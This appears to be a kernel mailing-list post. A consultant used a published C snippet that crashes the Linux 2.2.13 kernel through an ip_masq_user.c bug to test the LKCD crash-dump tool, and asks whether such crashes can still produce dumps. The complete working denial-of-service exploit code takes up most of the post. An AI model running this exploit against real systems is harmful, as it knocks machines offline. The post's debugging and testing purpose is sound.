Today there was a post on the kernel list of a snippet of C code to crash the
2.2.13 kernel via an ip_masq exploit. After modifying this to compile (header
names were slightly different for some reason), I ran it to test lkcd. The
system crashed so fast I could barely see what went on. Looked like several
oopses scrolled by, then the dreaded "killing interrupt handler" message. No
crash dump was generated. I have successfully created crash dumps on this
system via the tests described in the FAQ.
My question is, will or can this be fixed in a future version of lkcd? I don't
mean specifically relative to this crash case, but in the general "killing
interrupt handler" case. Mission Critical Linux claimed they were going to fix
this same type of problem in a future version of their crash patch. As of now
they are about three weeks overdue on that.
The code:
/* crash 2.2.13 kernel exploiting a bug in ip_masq_user.c (c)djsf */
#include <stdio.h>
#include <stdlib.h>      /* exit() */
#include <string.h>      /* memset() */
#include <sys/types.h>
#include <sys/socket.h>  /* socket(), setsockopt() */
#include <linux/types.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/ip.h>
/*
#include <netinet/ip_tcp.h>
#include <netinet/ip_udp.h>
*/
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <netinet/ip_icmp.h>
#include <linux/ip_fw.h>
#include <linux/ip_masq.h>

int main(void)
{
    int sock;
    struct ip_masq_ctl mctl;

    /* all-zero control block, only the target/command/protocol filled in */
    memset(&mctl, 0, sizeof(mctl));
    mctl.m_target = IP_MASQ_TARGET_USER;
    mctl.m_cmd = IP_MASQ_CMD_DEL;
    mctl.u.user.protocol = IPPROTO_UDP;

    /* raw socket is needed to reach the IP_FW_MASQ_CTL socket option */
    if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
        perror("socket");
        exit(1);
    }
    if (setsockopt(sock, IPPROTO_IP, IP_FW_MASQ_CTL, &mctl, sizeof(mctl)))
        perror("kab00m failed :) ");
    exit(0);
}
--
Brian Hall <brianw.hall@xxxxxxxxxx>
Linux Consultant